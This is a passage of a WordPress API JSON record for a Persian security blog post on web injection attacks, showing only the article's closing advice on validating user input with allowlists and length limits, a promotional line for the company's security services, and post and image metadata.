\u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u060c \u0628\u0627\u06cc\u062f \u0637\u0628\u0642 \u06cc\u06a9 \u0644\u06cc\u0633\u062a \u0645\u062c\u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0634\u0648\u0646\u062f \u060c \u0637\u0648\u0644 \u0631\u0634\u062a\u0647 \u062f\u0631 \u062d\u062f \u0645\u062c\u0627\u0632 \u0628\u0627\u0634\u062f \u0648 \u0627\u0632 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u200c\u0647\u0627\u06cc \u0646\u0627\u0645\u0631\u0628\u0648\u0637 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0634\u0648\u062f.<\/li>\n<\/ol>\n
\u0648 \u062f\u0631 \u0627\u0646\u062a\u0647\u0627…<\/strong><\/p>\n
\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u0645\u062e\u062a\u0635\u0631\u0627 \u0628\u0647 \u0645\u0631\u0648\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u067e\u0631\u062f\u0627\u062e\u062a\u06cc\u0645\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u06cc\u0645 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u062f\u0627\u0634\u062a\u0646 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u0648\u0628 \u0627\u0645\u0646\u060c \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u060c \u0645\u062e\u0635\u0648\u0635\u0627\u064b \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u06a9\u0627\u0631\u0628\u0631\u060c \u062f\u0631 \u062c\u0647\u062a \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0622\u0646\u060c \u062a\u0648\u062c\u0647 \u0648\u06cc\u0698\u0647\u200c\u0627\u06cc \u062f\u0627\u0634\u062a \u0648 \u062f\u0631 \u062c\u0647\u062a \u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u0622\u0646\u0647\u0627 \u06a9\u0648\u0634\u0627 \u0628\u0627\u0634\u06cc\u0645\u061b\u0632\u06cc\u0631\u0627 \u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u06cc\u062f\u06cc\u0645\u060c \u06af\u0627\u0647\u0627\u064b \u0648\u062c\u0648\u062f \u06cc\u06a9 \u0646\u0642\u0637\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u0634\u062f\u0647 \u0648 \u0628\u0647 \u0648\u0627\u0633\u0637\u0647\u200c\u06cc \u0622\u0646 \u062d\u0645\u0644\u0647\u060c \u062f\u0631\u06cc\u0686\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u062f\u06cc\u06af\u0631 \u0646\u06cc\u0632 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f.<\/p>\n
\n
\u0647\u0645\u0686\u0646\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0631\u0627\u0647\u0628\u0631\u0627\u0646 \u0641\u0646\u0627\u0648\u0631\u06cc \u067e\u0627\u0633\u0627\u0631\u06af\u0627\u062f \u062e\u062f\u0645\u0627\u062a\u06cc \u0631\u0627 \u062f\u0631 \u0631\u0627\u0633\u062a\u0627\u06cc \u0627\u0645\u0646 \u0633\u0627\u0632\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0628\u0631\u0627\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u06a9\u0644\u06cc\u06a9 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/a>.\u00a0<\/b><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647:<\/span> 10<\/span> \u062f\u0642\u06cc\u0642\u0647<\/span><\/span>\u062d\u0645\u0644\u0627\u062a Injection \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0645\u0639\u0631\u0648\u0641 \u0648 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f \u06a9\u0647 \u062a\u0627\u06a9\u0646\u0648\u0646\u060c \u0648\u0628\u200c\u0633\u0627\u06cc\u062a\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u0646\u062f. \u062d\u0645\u0644\u0627\u062a\u06cc \u06a9\u0647 \u0637\u0628\u0642 \u0622\u0645\u0627\u0631 \u0634\u0631\u06a9\u062a OWASP\u060c \u0633\u0627\u0644\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a \u067e\u0631 \u0631\u062e\u062f\u0627\u062f\u200c\u062a\u0631\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f.<\/p>\n","protected":false},"author":5,"featured_media":4448,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[75],"tags":[93],"better_featured_image":{"id":4448,"alt_text":"","caption":"","description":"","media_type":"image","media_details":{"width":1000,"height":700,"file":"2021\/10\/shakhes-4.jpg","sizes":{"medium":{"file":"shakhes-4-300x210.jpg","width":300,"height":210,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-300x210.jpg"},"thumbnail":{"file":"shakhes-4-150x150.jpg","width":150,"height":150,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-150x150.jpg"},"medium_large":{"file":"shakhes-4-768x538.jpg","width":768,"height":538,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-768x538.jpg"},"publisher-tb1":{"file":"shakhes-4-86x64.jpg","width":86,"height":64,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-86x64.jpg"},"publisher-sm":{"file":"shakhes-4-210x136.jpg","width":210,"height":136,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-210x136.jpg"},"publisher-mg2":{"file":"shakhes-4-279x220.jpg","width":279,"height":220,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-279x220.jpg"},"publisher-md":{"file":"shakhes-4-357x210.jpg","width":357,"height":210,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-357x210.jpg"},"publisher-lg":{"file":"shakhes-4-750x430.jpg","width":750,"height":430,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-750x430.jpg"},"publisher-full":{"file":"shakhes-4-1000x580.jpg","width":1000,"height":580,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-1000x580.jpg"},"publisher-tall-sm":{"file":"shakhes-4-180x217.jpg","width":180,"height":217,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-180x217.jpg"},"publisher-tall-lg":{"file":"shakhes-4-267x322.jpg","width":267,"height":322,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-267x322.jpg"},"publisher-tall-big":{"file":"shakhes-4-368x445.jpg","width":368,"height":445,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-368x445.jpg"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"1","keywords":[]}},"post":4438,"source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4.jpg"},"fimg_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4.jpg","_links":{"self":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438"}],"collection":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/comments?post=4438"}],"version-history":[{"count":13,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438\/revisions"}],"predecessor-version":[{"id":5369,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438\/revisions\/5369"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/media\/4448"}],"wp:attachment":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/media?parent=4438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/categories?post=4438"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/tags?post=4438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}